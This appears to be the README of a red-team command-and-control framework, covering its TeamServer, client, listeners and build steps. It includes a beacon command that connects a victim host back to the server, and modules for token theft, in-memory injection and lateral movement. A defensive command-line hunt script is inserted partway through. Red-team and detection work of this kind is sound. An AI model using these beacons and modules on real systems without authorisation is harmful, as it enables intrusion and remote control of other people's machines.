Exploration is a rudimentary red team command and control framework.
This repository contains the TeamServer and the Client.
The TeamServer is a standalone application, written in C++, that handles listeners. The client, written in Python, communicates with the TeamServer through gRPC.
Beacons run on the victim host. Each Beacon that connects back to the TeamServer opens a new session. This session is used to control the Beacon, send commands and receive results.
Listeners and Beacons can communicate through TCP, SMB, HTTP, HTTPS and GitHub issues, depending on the situation.
A compiled static version of the TeamServer is ready to use in Release, with some default certificates for gRPC communication and the HTTP Listener:
The TeamServer binary is in ./Release/TeamServer
It is launched using:
./TeamServer
The Python Client is in ./Release/Client
It is launched using:
python3 GUI.py
Four types of listeners are available from the TeamServer: HTTP and HTTPS, which start a web server on the given port; TCP, which starts a TCP server on the given port; and GitHub, which uses GitHub issues from a project like "maxDcb/C2TeamServer" and a personal access token (with issues write rights).
Windows Beacons and command modules are compiled separately in another project, but compiled versions are provided in ./Release/Beacons and ./Release/Modules so they can be used directly.
.\BeaconHttp.exe 10.10.52.5 8443 https
When the Beacon starts and connects to the TeamServer, a new session is opened from which you can interact with the Beacon.
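A defender-side hunt for the invocation shown above, as an added example that is not part of the project's code: it flags process command lines with the `<image> <IPv4> <port> <http|https>` argument shape, so a renamed binary still matches. The event records and their field names (`host`, `cmdline`) are constructed for illustration.

```python
import ipaddress
import re

# Argument shape from the invocation shown above: <image> <IPv4> <port> <http|https>.
# Matching on shape instead of file name still catches a renamed binary.
BEACON_ARGS = re.compile(
    r'^(?:"[^"]+"|\S+)\s+(?P<ip>\S+)\s+(?P<port>\d{1,5})\s+(?P<scheme>https?)\s*$',
    re.IGNORECASE,
)
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed process-creation records; field names are assumptions, not a real schema.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r".\BeaconHttp.exe 10.10.52.5 8443 https"},
    {"host": "WS02", "cmdline": r'"C:\Users\Public\svc host.exe" 203.0.113.7 443 HTTPS'},
    {"host": "WS03", "cmdline": r"ping.exe 10.10.52.5 -n 4"},
    {"host": "WS04", "cmdline": r"tool.exe not.an.ip 8443 https"},
    {"host": "WS06", "cmdline": r"tool.exe 10.0.0.1 70000 http"},
]


def match_beacon_cmdline(cmdline):
    """Return (ip, port, scheme) if the command line has the beacon argument shape, else None."""
    m = BEACON_ARGS.match(cmdline.strip())
    if not m:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group("ip"))
    except ipaddress.AddressValueError:
        return None  # second argument is not a valid IPv4 address
    port = int(m.group("port"))
    return (str(ip), port, m.group("scheme").lower()) if 1 <= port <= 65535 else None


def hunt(events):
    """Return one finding per event whose command line matches the shape."""
    findings = []
    for ev in events:
        hit = match_beacon_cmdline(ev["cmdline"])
        if hit:
            ip, port, scheme = hit
            internal = any(ipaddress.IPv4Address(ip) in net for net in RFC1918)
            findings.append({"host": ev["host"], "dest": f"{scheme}://{ip}:{port}",
                             "internal_dest": internal})
    return findings


if __name__ == "__main__":
    print(*hunt(SAMPLE_EVENTS), sep="\n")
```

Other tools that take the same three arguments will also match, so treat a hit as a lead to correlate with network telemetry rather than a verdict.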
The Windows Beacon primarily uses the Windows API and starts with no module loaded. Modules are loaded at runtime using the "MemoryModule" project, which loads DLLs sent by the TeamServer to the Beacon.
| Modules |
|---|
| assemblyExec |
| upload |
| download |
| run |
| script |
| inject |
| pwd |
| cd |
| ls |
| ps |
| makeToken |
| rev2self |
| stealToken |
| coffLoader |
| loadModule |
| powershell |
| kerberosUseTicket |
| psExec |
| wmiExec |
| spawnAs |
| chisel |
| tree |
AssemblyExec and Inject, which use the Donut project, make it possible to launch EXE and DLL binaries, managed or unmanaged, directly from memory on the remote host.
Coff, which uses the COFFLoader project, is used to run COFF files.
Two side projects can be used to deliver the beacons:
A very basic Linux Beacon written in Python can be found here: C2ImplantPy.
Another very basic Linux Beacon written in Nim can be found here: C2ImplantPy.
- Donut: Create shellcode from PE files.
- cpp-httplib: HTTP and HTTPS Listener.
- CoffLoader: Run object files from CS-Situational-Awareness-BOF.
- MemoryModule: Load DLLs at runtime.
- UnmanagedPowerShell: PowerShell for unmanaged code.
- cpp-base64: Base64.
- json: JSON parser.
sudo apt install gcc-mingw-w64
sudo apt install g++-mingw-w64
sudo apt install golang-cfssl
sudo apt install cmake
pip3 install pycryptodome
pip install conan
pip install grpcio
pip install PyQt5
pip install pyqtdarktheme
pip install protobuf
conan profile detect
git clone https://github.com/maxDcb/C2TeamServer.git
cd C2TeamServer
git submodule update --init
mkdir build
cd build
cmake ..
make -j4
The TeamServer binary is in ./Release/TeamServer
It is launched using './TeamServer'
The Python Client is in ./Release/Client
It is launched using 'python3 GUI.py'










